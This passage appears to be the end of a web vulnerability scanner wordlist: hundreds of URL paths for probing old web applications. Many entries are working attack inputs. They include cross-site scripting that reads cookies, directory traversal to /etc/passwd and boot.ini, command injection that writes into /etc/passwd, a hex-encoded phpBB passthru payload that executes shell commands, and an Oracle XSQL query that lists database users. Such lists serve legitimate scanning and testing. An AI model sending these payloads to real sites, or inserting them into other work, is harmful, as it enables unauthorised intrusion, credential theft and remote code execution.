us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini usage/ user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com user.php?op=userinfo&uname= user/ useraction.php3 usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27) userinfo.php?uid=1; userlog.php userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd userreg.nsf users.lst users.nsf users.php?mode=profile&uid=<script>alert(document.cookie)</script> users/ users/scripts/submit.cgi ustats/ usuario/ usuarios/ utils/sprc.asp utils/sprc.asp+ vars.inc+ vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 vc30/ vchat/msg.txt vfs/ vgn/ac/data vgn/ac/delete vgn/ac/edit vgn/ac/esave vgn/ac/fsave vgn/ac/index vgn/asp/MetaDataUpdate vgn/asp/previewer vgn/asp/status vgn/asp/style vgn/errors vgn/jsp/controller vgn/jsp/errorpage vgn/jsp/initialize vgn/jsp/jspstatus vgn/jsp/jspstatus56 vgn/jsp/metadataupdate vgn/jsp/previewer vgn/jsp/style vgn/legacy/edit vgn/legacy/save vgn/license vgn/login vgn/login/1,501,,00.html?cookieName=x--\> vgn/performance/TMT vgn/performance/TMT/Report vgn/performance/TMT/Report/XML vgn/performance/TMT/reset vgn/ppstats vgn/previewer vgn/record/previewer vgn/style vgn/stylepreviewer vgn/vr/Deleting vgn/vr/Editing vgn/vr/Saving vgn/vr/Select vider.php3 view_source.jsp viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1 viewpage.php?file=/etc/passwd viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 vpuserinfo.nsf w3perl/admin w-agora/ wa.exe warez/ wbboard/profile.php wbboard/reply.php web800fo/ web-console/ServerInfo.jsp%00 web.config web.nsf web/ web/ webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif web_app/WEB-INF/webapp.properties webaccess.htm webaccess/access-options.txt webadmin.nsf webadmin/ webalizer/ webamil/test.php webamil/test.php?mode=phpinfo webapp/admin/_pages/_bc4jadmin/ webboard/ webcache/ webcache/webcache.xml webcalendar/colors.php?color= webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd webcalendar/login.php webcalendar/view_m.php webcalendar/week.php?eventinfo= webcalendar/week.php?user=\"> webcart-lite/ webcart-lite/config/import.txt webcart-lite/orders/import.txt webcart/ webcart/carts/ webcart/config/ webcart/config/clients.txt webcart/orders/ webcart/orders/import.txt webchat/register.php?register=yes&username=OverG&email=&email1= webdata/ webdav/index.html weblog/ weblogic weblogs/ webmail/ webmail/blank.html webmail/horde/test.php webmail/lib/emailreader_execute_on_each_page.inc.php webmail/src/read_body.php webmaster_logs/ website/ webstats/ webtools/bonsai/cvsblame.cgi?file= webtools/bonsai/cvslog.cgi?file=*&rev=&root= webtools/bonsai/cvslog.cgi?file= webtools/bonsai/cvsquery.cgi?branch=&file=&date= webtools/bonsai/cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD webtools/bonsai/showcheckins.cgi?person= webtop/wdk/ webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef webtop/wdk/samples/index.jsp webuser.nsf welcome.nsf whatever.htr whatever.htr whateverJUNK(4).html wikihome/action/conflict.php windows/ wksinst.nsf word/ work/ ws_ftp.ini wstats/ wusage/ www-sql/ www/ wwwboard/passwd.txt wwwboard/wwwboard.cgi wwwboard/wwwboard.pl wwwjoin/ wwwlog/ wwwping/index.stm?wwwsite= wwwstats.html wwwstats/ wwwthreads/3tvars.pm wwwthreads/w3tvars.pm wx/s.dll?d=/boot.ini x_stat_admin.php xdk/ xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS yabbse/Reminder.php yabbse/Sources/Packages.php z_user_show.php?method=showuserlink&class=&rollid=admin&x=3da59a9da8825& zentrack/index.php zipfiles/ zorum/index.php?method=<script>alert('Vulnerable')</script> ~/.asp ~/.aspx ~/.aspx?aspxerrorpath=null ~nobody/etc/passwd ~root/